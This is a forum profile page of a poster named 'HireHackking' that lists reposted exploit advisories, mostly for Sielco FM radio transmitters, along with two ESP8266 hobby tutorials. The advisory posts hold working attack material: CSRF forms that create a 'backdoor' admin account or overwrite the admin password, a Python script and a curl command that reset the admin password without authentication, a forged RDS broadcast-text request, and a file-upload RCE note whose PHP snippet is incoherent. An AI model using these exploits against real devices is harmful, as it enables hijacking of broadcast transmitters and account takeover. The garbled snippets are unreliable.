Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 03.30.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html ## Reference: https://portswigger.net/web-security/file-upload ## Description: The malicious user can request an account from the administrator of this system. Then he can use this vulnerability to destroy or get access to all accounts of this system, even more, worst than ever. The malicious user can upload a very dangerous file on this server, and he can execute it via shell, this is because he can access the upload function from the administrator account. The status is CRITICAL. STATUS: HIGH Vulnerability [+]Exploit: ```mysql <?php // by nu11secur1ty - 2023 // Old Name Of The file $old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ; // New Name For The File $new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ; // using rename() function to rename the file rename( $old_name, $new_name) ; ?> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0) ## Proof and Exploit: [href](https://streamable.com/szb9qy) ## Time spend: 00:45:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  2. HireHackking

    Title: esp8266 Relay WiFi

    HireHackking posted a blog entry in Hacker Technology
    I turned the board worth more than ten yuan into a router. List esp8266 board one software ESP8266Flasher Instructions: Download the firmware that is flashed first, esp8266 wifi relay firmware In the firmware,0x00000.bin is written to the address0x00000, and0x10000.bin file is written to the address0x10000. As shown in the figure After the flashing is completed, MYAP's ssid will appear Access after connection 192.168.4.1 Configure Internet speed test Advantages and disadvantages Advantages: Small and convenient, simple and practical, the most important thing is cheap~ Disadvantages: Low efficiency, easy to disconnect, and slow network speed.
  3. HireHackking

    Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: 2.12 (EXC5000GX) 2.12 (EXC120GX) 2.11 (EXC300GX) 2.10 (EXC1600GX) 2.10 (EXC2000GX) 2.08 (EXC1600GX) 2.08 (EXC1000GX) 2.07 (EXC3000GX) 2.06 (EXC5000GX) 1.7.7 (EXC30GT) 1.7.4 (EXC300GT) 1.7.4 (EXC100GT) 1.7.4 (EXC5000GT) 1.6.3 (EXC1000GT) 1.5.4 (EXC120GT) Summary: Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China. Desc: The Cookie session ID 'id' is of an insufficient length and can be exploited by brute force, which may allow a remote attacker to obtain a valid session, bypass authentication and manipulate the transmitter. Tested on: lwIP/2.1.1 Web/3.0.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5758 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5758.php 26.01.2023 -- # Session values (len=5) Cookie: id=44189 Cookie: id=37692 Cookie: id=+6638 Cookie: id=+3077 ... ...
  4. HireHackking

    Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    <!-- ## Exploit Title: Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery ## Exploit Author: LiquidWorm Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: 2.12 (EXC5000GX) 2.12 (EXC120GX) 2.11 (EXC300GX) 2.10 (EXC1600GX) 2.10 (EXC2000GX) 2.08 (EXC1600GX) 2.08 (EXC1000GX) 2.07 (EXC3000GX) 2.06 (EXC5000GX) 1.7.7 (EXC30GT) 1.7.4 (EXC300GT) 1.7.4 (EXC100GT) 1.7.4 (EXC5000GT) 1.6.3 (EXC1000GT) 1.5.4 (EXC120GT) Summary: Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: lwIP/2.1.1 Web/3.0.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5757 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5757.php 26.01.2023 --> CSRF Add Admin: --------------- <html> <body> <form action="http://transmitter/protect/users.htm" method="POST"> <input type="hidden" name="pwd0" value="" /> <input type="hidden" name="pwd0bis" value="" /> <input type="hidden" name="user1" value="" /> <input type="hidden" name="pwd1" value="" /> <input type="hidden" name="pwd1bis" value="" /> <input type="hidden" name="auth1" value="" /> <input type="hidden" name="user2" value="" /> <input type="hidden" name="pwd2" value="" /> <input type="hidden" name="pwd2bis" value="" /> <input type="hidden" name="auth2" value="" /> <input type="hidden" name="user3" value="backdoor" /> <input type="hidden" name="pwd3" value="backdoor123" /> <input type="hidden" name="pwd3bis" value="backdoor123" /> <input type="hidden" name="auth3" value="2" /> <input type="submit" value="Adminize!" /> </form> </body> </html>
  5. HireHackking

    Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password

    HireHackking posted a blog entry in Hacker Technology
    <!-- ## Exploit Title: Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: 2.12 (EXC5000GX) 2.12 (EXC120GX) 2.11 (EXC300GX) 2.10 (EXC1600GX) 2.10 (EXC2000GX) 2.08 (EXC1600GX) 2.08 (EXC1000GX) 2.07 (EXC3000GX) 2.06 (EXC5000GX) 1.7.7 (EXC30GT) 1.7.4 (EXC300GT) 1.7.4 (EXC100GT) 1.7.4 (EXC5000GT) 1.6.3 (EXC1000GT) 1.5.4 (EXC120GT) Summary: Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China. Desc: The application suffers from improper access control when editing users. A user with Read permissions can manipulate users, passwords and permissions by sending a single HTTP POST request with modified parameters and edit other users' names, passwords and permissions including admin password. Tested on: lwIP/2.1.1 Web/3.0.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5756 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5756.php 26.01.2023 --> <html> <body> <form action="http://transmitter/protect/users.htm" method="POST"> <input type="hidden" name="pwd0" value="PWDCHANGED" /> <!-- This will set/modify admin pwd --> <input type="hidden" name="pwd0bis" value="PWDCHANGED" /> <!-- This will set/modify admin pwd --> <input type="hidden" name="user1" value="" /> <!-- This will set/modify user1 --> <input type="hidden" name="pwd1" value="" /> <!-- This will set/modify user1 pwd --> <input type="hidden" name="pwd1bis" value="" /> <!-- This will set/modify user1 pwd --> <input type="hidden" name="auth1" value="0" /> <!-- This will set user1 read perm --> <input type="hidden" name="user2" value="" /> <!-- This will set/modify user2 --> <input type="hidden" name="pwd2" value="" /> <!-- This will set/modify user2 pwd --> <input type="hidden" name="pwd2bis" value="" /> <!-- This will set/modify user2 pwd --> <input type="hidden" name="auth2" value="0" /> <!-- This will set user2 read perm --> <input type="hidden" name="user3" value="" /> <!-- This will set/modify user3 --> <input type="hidden" name="pwd3" value="" /> <!-- This will set/modify user3 pwd --> <input type="hidden" name="pwd3bis" value="" /> <!-- This will set/modify user3 pwd --> <input type="hidden" name="auth3" value="0" /> <!-- This will set user3 read perm --> <input type="submit" value="Modify admin pwd, delete all users" /> </form> </body> </html>
  6. HireHackking

    Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5768 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php 26.01.2023 -- index.htm: ---------- 54: function dologin() { 55: var hash = hex_md5($('#password').val() + id); 56: $.get('/login.cgi', { 57: user: $('#user').val(), 58: password: hash, 59: id: id 60: }).done(function (data) { 61: var dati = $.parseXML(data); 62: id = $(dati).find('id').text(); 63: user = $(dati).find('u').text(); 64: if (id == 0) 65: window.location.href = '/index.htm'; 66: else { 67: scriviCookie('polyeco', id, 180); 68: if (user >= 3) 69: window.location.href = '/protect/factory.htm'; 70: else 71: window.location.href = '/protect/index.htm'; 72: } 73: }); 74: } The function 'dologin()' in index.htm is called when a user submits a login form. It starts by calculating a hash of the user-entered password and a variable 'id' using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi' endpoint with the user's entered username, the calculated password hash and the 'id' variable as parameters. If the request is successful, the function parses the XML data returned from the server, extracting the values of the 'id' and 'u' elements. Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the value of 'id' and expires after 180 days. After that it checks the value of the 'user' variable, if it's greater than or equal to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side JavaScript to always set the 'user' variable to a high value (4), or by tampering with the data sent to the server during the login process to change the value of the 'user' variable. It also works if the server's response variable 'user' is modified.
  7. HireHackking

    Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    <!-- ## Exploit Title: Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: 2.12 (EXC5000GX) 2.12 (EXC120GX) 2.11 (EXC300GX) 2.10 (EXC1600GX) 2.10 (EXC2000GX) 2.08 (EXC1600GX) 2.08 (EXC1000GX) 2.07 (EXC3000GX) 2.06 (EXC5000GX) 1.7.7 (EXC30GT) 1.7.4 (EXC300GT) 1.7.4 (EXC100GT) 1.7.4 (EXC5000GT) 1.6.3 (EXC1000GT) 1.5.4 (EXC120GT) Summary: Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China. Desc: The application suffers from a privilege escalation vulnerability. A user with Read permissions can elevate his/her privileges by sending a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3' to integer value '1' for Write or '2' for Admin permissions. Tested on: lwIP/2.1.1 Web/3.0.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5755 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php 26.01.2023 --> <html> <body> <form action="http://transmitter/protect/users.htm" method="POST"> <input type="hidden" name="pwd0" value="" /> <input type="hidden" name="pwd0bis" value="" /> <input type="hidden" name="user1" value="" /> <input type="hidden" name="pwd1" value="" /> <input type="hidden" name="pwd1bis" value="" /> <input type="hidden" name="auth1" value="" /> <input type="hidden" name="user2" value="test" /> <input type="hidden" name="pwd2" value="" /> <input type="hidden" name="pwd2bis" value="" /> <input type="hidden" name="auth2" value="2" /> <input type="hidden" name="user3" value="" /> <input type="hidden" name="pwd3" value="" /> <input type="hidden" name="pwd3bis" value="" /> <input type="hidden" name="auth3" value="" /> <input type="submit" value="Escalate" /> </form> </body> </html>
  8. HireHackking

    Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # -*- coding: utf-8 -*- ## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit ## Exploit Author: LiquidWorm # # # Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit # # # Vendor: Sielco S.r.l # Product web page: https://www.sielco.org # Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 # PolyEco1000 CPU:1.9.4 FPGA:10.19 # PolyEco1000 CPU:1.9.3 FPGA:10.19 # PolyEco500 CPU:1.7.0 FPGA:10.16 # PolyEco300 CPU:2.0.2 FPGA:10.19 # PolyEco300 CPU:2.0.0 FPGA:10.19 # # Summary: PolyEco is the innovative family of high-end digital # FM transmitters of Sielco. They are especially suited as high # performance power system exciters or compact low-mid power # transmitters. The same cabinet may in fact be fitted with 50, # 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, # 1000). # # All features can be controlled via the large touch-screen display # 4.3" or remotely. Many advanced features are inside by default # in the basic version such as: stereo and RDS encoder, audio # change-over, remote-control via LAN and SNMP, "FFT" spectral # analysis of the audio sources, SFN synchronization and much more. # # Desc: The application suffers from an authentication bypass and # account takeover/lockout vulnerability that can be triggered by # directly calling the users object and effectively modifying the # password of the two constants user/role (user/admin). This can # be exploited by an unauthenticated adversary by issuing a single # POST request to the vulnerable endpoint and gain unauthorized # access to the affected device with administrative privileges. # # Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2023-5769 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php # # # 26.01.2023 # # import requests print( ''' .- _ _ -. / / \\ \\ ( ( (` (-o-) `) ) ) \ \_ ` -+- ` _/ / `- -+- -` -+- -+- -+- -+- -+- -+- / \\ ***************************************************** ! Sielco PolyEco Authentication Bypass Script ! ***************************************************** Please note that this script is for educational and ethical purposes only. Using it for unauthorized access or malicious activities is strictly prohibited and can have serious legal and ethical consequences. The responsibility of using this script in a lawful and ethical manner lies solely with the user. The author or creator of this script shall not be held responsible for any unlawful or unethical activities performed by the users. ''' ) url = input( ' Enter the URL (e.g. http://host:8090): ' ) if not 'http' in url : url = 'http://{}'.format( url ) user = input( ' Enter the desired role (e.g. user or admin): ') if user not in [ 'user', 'admin' ] : exit( ' Only \'user\' or \'admin\' please.' ) password = input( ' Enter the desired password: ' ) end = '/protect/users.htm' payload = {} if user == "user" : payload[ 'pwd_admin' ] = '' payload[ 'pwd_user' ] = password elif user == 'admin' : payload[ 'pwd_admin' ] = password payload[ 'pwd_user' ] = '' r = requests.post( url + end, data = payload ) if r.status_code == 200 : print( '\n MSG: OK.' ) else: print( '\n MSG: ERROR!' )
  9. HireHackking

    Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions and manipulate the RDS text display. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5767 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php 26.01.2023 -- POST /protect/rds.htm HTTP/1.1 Host: RADIOFM rds_inta=1 rds_intb=0 rds_pi=381 rds_ps=ZSL rds_rta=www.zeroscience.mk rds_rtb rds_rtt=0 rds_tp=0 rds_tp=1 rds_ta=0 rds_ms=0 rds_pty=4 rds_ptyn= rds_ecc=00 rds_ct=0 rds_level=90 rds_psd=0 rds_psd1 rds_pst1=0 rds_psd5 rds_pst5=0 rds_psd2 rds_pst2=0 rds_psd6 rds_pst6=0 rds_psd3 rds_pst3=0 rds_psd7 rds_pst7=0 rds_psd4 rds_pst4=0 rds_psd8 rds_pst8=0 rds_di_pty=0 rds_di_cmp=0 rds_di_cmp=1 rds_di_st=0 rds_di_art=0 rds_di_art=1 a0=90 a1=9 a2=26 a3=115 a4=0 a5=0 a6=0 a7=0 a8=0 a9=0 a10=0 a11=0 a12=0 a13=0 a14=0 a15=0 a16=0 a17=0 a18=0 a19=0 a20=0 a21=0 a22=0 a23=0 a24=0
  10. HireHackking

    Title: esp8266(nodemcu) +DHT11 temperature and humidity sensor

    HireHackking posted a blog entry in Hacker Technology
    In this tutorial, you will learn how to use the DHT11 temperature and humidity sensor on a NodeMCU. And understand how the temperature and humidity sensor works, and how to view the values read by the sensor through the serial monitor. Equipment List NodeMCU development board one DHT11 temperature and humidity sensor one (DHT11 module) (NodeMcu board) DHT11 detects water vapor by measuring the resistance between two electrodes. A moisturizing substrate with electrodes on the surface of the humidity detection component. When water vapor is absorbed by the substrate, ions are released by the substrate, and this process will increase the conductivity between the electrodes. The resistance change between the two electrodes is proportional to the relative humidity. Higher relative humidity reduces the resistance between electrodes, while lower relative humidity increases the resistance between electrodes. How to connect DHT11 on NodeMCU Connecting the DHT11 to the NodeMCU is simple, but the connection method varies depending on whether you are using a 3-pin sensor or a 4-pin sensor. The connection method is as follows: The +3V pin of the nodemcu is marked on the DHT11 with the (+ or VCC) pin. DHT11 is marked with the (S or OUT) pin to connect to the D4V pin of nodemcu. The GND pin of the nodemcu connected to the GND pin marked with the (- or GND) pin on DHT11. The code is as follows #include SimpleDHT.h //for DHT11, //VCC: 5V or 3V //GND: GND //DATA: 2 int pinDHT11=2; SimpleDHT11 dht11(pinDHT11); void setup() { Serial.begin(115200); } void loop() { //start working. Serial.println('================================='); Serial.println('Sample DHT11.'); //read without samples. byte temperature=0; byte humidity=0; int err=SimpleDHTErrSuccess; if ((err=dht11.read(temperature, humidity, NULL)) !=SimpleDHTErrSuccess) { Serial.print('Read DHT11 failed, err='); Serial.println(err); delay(1000); return; } Serial.print('Sample OK:'); Serial.print((int)temperature); Serial.print(' *C, '); Serial.print((int)humidity); Serial.println(' H'); //DHT11 sampling rate is 1HZ. delay(1500); }github address User Demo DHT11+WEB version Let's take a look at the effect first Feedback the DHT11 data through the web server. Development ideas We first need to install two libraries DHT and Adafruit Unified Sensor The code is as follows: #include ESP8266WiFi.h #include ESP8266WebServer.h #include 'DHT.h' //Uncomment one of the lines below for whatever DHT sensor type you're using! #define DHTTYPE DHT11 //DHT 11 //#define DHTTYPE DHT21 //DHT 21 (AM2301) //#define DHTTYPE DHT22 //DHT 22 (AM2302), AM2321 /*Put your SSID Password*/ const char* ssid='kali'; //Enter SSID here const char* password='12345678900'; //Enter Password here ESP8266WebServer server(80); //DHT Sensor uint8_t DHTPin=D4; //Initialize DHT sensor. DHT dht(DHTPin, DHTTYPE); float Temperature; float Humidity; void setup() { Serial.begin(115200); delay(100); pinMode(DHTPin, INPUT); dht.begin(); Serial.println('Connecting to '); Serial.println(ssid); //connect to your local wi-fi network WiFi.begin(ssid, password); //check wi-fi is connected to wi-fi network while (WiFi.status() !=WL_CONNECTED) { delay(1000); Serial.print('.'); } Serial.println(''); Serial.println('WiFi connected.'); Serial.print('Got IP:'); Serial.println(WiFi.localIP()); server.on('/', handle_OnConnect); server.onNotFound(handle_NotFound); server.begin(); Serial.println('HTTP server started'); } void loop() { server.handleClient(); } void handle_OnConnect() { Temperature=dht.readTemperature(); //Gets the values of the temperature Humidity=dht.readHumidity(); //Gets the values of the humidity server.send(200, 'text/html', SendHTML(Temperature, Humidity)); } void handle_NotFound(){ server.send(404, 'text/plain', 'Not found'); } String SendHTML(float Temperaturestat,float Humiditystat){ String ptr='!DOCTYPE html html\n'; ptr +='head meta name=\'viewport\' content=\'width=device-width, initial-scale=1.0, user-scalable=no\'\n'; ptr +='link href=\'https://fonts.googleapis.com/css?family=Open+Sans:300,400,600\' rel=\'stylesheet\'\n'; ptr +='meta charset=\'UTF-8\'\n'; ptr +='titlePriess's nest—smart thermometer/title\n'; ptr +='stylehtml { font-family: 'Open Sans', sans-serif; display: block; margin: 0px auto; text-align: center;color: #333333;}\n'; ptr +='body{margin-top: 50px;}\n'; ptr +='h1 {margin: 50px auto 30px;}\n'; ptr +=' .wd {margin: 50px auto 30px;width: auto;color: #f39c12}\n'; ptr +=' .wd1 {margin: 50px auto 30px;width: auto;color: #3498db}\n'; ptr +='.side-by-side{display: inline-block;vertical-align: middle;position: relative;}\n'; ptr +='.humidity-icon{background-color: #3498db;width: 30px;height: 30px;border-radius: 50%;line-height: 36px;}\n'; ptr +='.humidity-text{font-weight: 600;padding-left: 15px;font-size: 19px;width: 160px;text-align: left;}\n'; ptr +='.humidity{font-weight: 300;font-size: 60px;color: #3498db;}\n'; ptr +='.temperature-icon{background-color: #f39c12;width: 30px;height: 30px;border-radius: 50%;line-height: 40px;}\n'; ptr +='.temperature-text{font-weight: 600;padding-left: 15px;font-size: 19px;width: 160px;text-align: left;}\n'; ptr +='.temperature{font-weight: 300;font-size: 60px;color: #f39c12;}\n'; ptr +='.superscript{font-size: 17px;font-weight: 600;position: absolute;right: -20px;top: 15px;}\n'; ptr +='.data{padding: 10px;}\n'; ptr +='/style\n'; ptr +='/head\n'; ptr +='body\n'; ptr +='div id=\'webpage\'\n'; ptr +='h1 indoor greenhouse detection system/h1\n'; ptr +='div class=\'data\'\n'; ptr +='div class=\'side-by-side temperature-icon\'\n'; ptr +='svg version=\'1.1\' id=\'Layer_1\' xmlns=\'http://www.w3.org/2000/svg\' xmlns:xlink=\'http://www.w3.org/1999/xlink\' x=\'0px\' y=\'0px\'\n'; ptr +='width=\'9.915px\' height=\'22px\' viewBox=\'0 0 9.915 22\' enable-background=\'new 0 0 9.915 22\' xml:space=\'preserve\'\n'; ptr +='path fill=\'#FFFFFF\' d=\'M3.498,0.53c0.377-0.331,0.877-0.501,1.374-0.527C5.697-0.04,6.522,0.421,6.924,1.142\n'; ptr +='c0.237,0.399,0.315,0.871,0.311,1.33C7.229,5.856,7.245,9.24,7.227,12.625c1.019,0.539,1.855,1.424,2.301,2.491\n'; ptr +='c0.491,1.163,0.518,2.514,0.062,3.693c-0.414,1.102-1.24,2.038-2.276,2.594c-1.056,0.583-2.331,0.743-3.501,0.463\n'; ptr +='c-1.417-0.323-2.659-1.314-3.3-2.617C0.014,18.26-0.115,17.104,0.1,16.022c0.296-1.443,1.274-2.717,2.58-3.394\n'; ptr +='c0.013-3.44,0-6.881,0.007-10.322C2.674,1.634,2.974,0.955,3.498,0.53z\'/\n'; ptr +='/svg\n'; ptr +='/div\n'; ptr +='div class=\'side-by-side temperature-text\'Indoor temperature: /div\n'; ptr +='div class=\'side-by-side temperature\''; ptr +=(int)Temperaturestat; ptr +='span class=\'superscript\'°C/span/div\n'; ptr +='/div\n'; ptr +='div class=\'data\'\n'; ptr +='div class=\'side-by-side humidity-icon\'\n'; ptr +='svg version=\'1.1\' id=\'Layer_2\' xmlns=\'http://www.w3.org/2000/svg\' xmlns:xlink=\'http://www.w3.org/1999/xlink\' x=\'0px\' y=\'0px\'\n\'; width=\'12px\' height=\'17.955px\' viewBox=\'0 0 13 17.955\' enable-background=\'new 0 0 13 17.955\' xml:space=\'preserve\'\n'; ptr +='path fill=\'#FFFFFF\' d=\'M1.819,6.217C3.139,4.064,6.5,0,6.5,0s3.363,4.064,4.681,6.217c1.793,2.926,2.133,5.05,1.571,7.057\n'; ptr +='c-0.438,1.574-2.264,4.681-6.252,4.681c-3.988,0-5.813-3.107-6.252-4.681C-0.313,11.267,0.026,9.143,1.819,6.217\'/path\n'; ptr +='/svg\n'; ptr +='/div\n'; ptr +='div class=\'side-by-side humidity-text\'Indoor humidity: /div\n'; ptr +='div class=\'side-by-side humidity\''; ptr +=(int)Humiditystat; ptr +='span class=\'superscript\'%/span/div\n'; ptr +='/div\n'; //Define the temperature variable and assign the value to use for logical judgment. int wd=Temperaturestat ; if (wd=30){ ptr +='div class=\'wd\'Hi~ Baby, the weather is so hot today, so inject heat prevention! /div\n'; } if (29=wdwd20){ ptr +='div class=\'wd1\'Hi~ Baby, the weather is nice today, so let's have fun! /div\n'; } if (wd10){ ptr +='div class=\'side-by-side humidity-text\'Hi~ The weather is cold today, so wear more clothes and be careful to catch a cold! /div\n'; } ptr +='/div\n'; ptr +='/body\n'; ptr +='/html\n'; return ptr; }I added a warm reminder based on the source code! When the temperature is in different ranges, different greetings are prompted. //Define the temperature variable and assign the value to use for logical judgment. int wd=Temperaturestat ; if (wd=30){ ptr +='div class=\'wd\'Hi~ Baby, the weather is so hot today, so inject heat prevention! /div\n'; } if (29=wdwd10){ ptr +='div class=\'wd1\'Hi~ Baby, the weather is nice today, so let's have fun! /div\n'; } if (wd=10){ ptr +='div class=\'side-by-side humidity-text\'Hi~ The weather is cold today, so wear more clothes and be careful to catch a cold! /div\n'; }
  11. HireHackking

    Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP ## Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: The application suffers from an authentication bypass, account takeover/lockout and elevation of privileges vulnerability that can be triggered by directly calling the users object and effectively modifying the password of the two constants user/role (user/admin). This can be exploited by an unauthenticated adversary by issuing a single POST request to the vulnerable endpoint and gain unauthorized access to the affected device with administrative privileges. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5765 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php 26.01.2023 -- # Change admin pwd $ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm
  12. HireHackking

    Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure

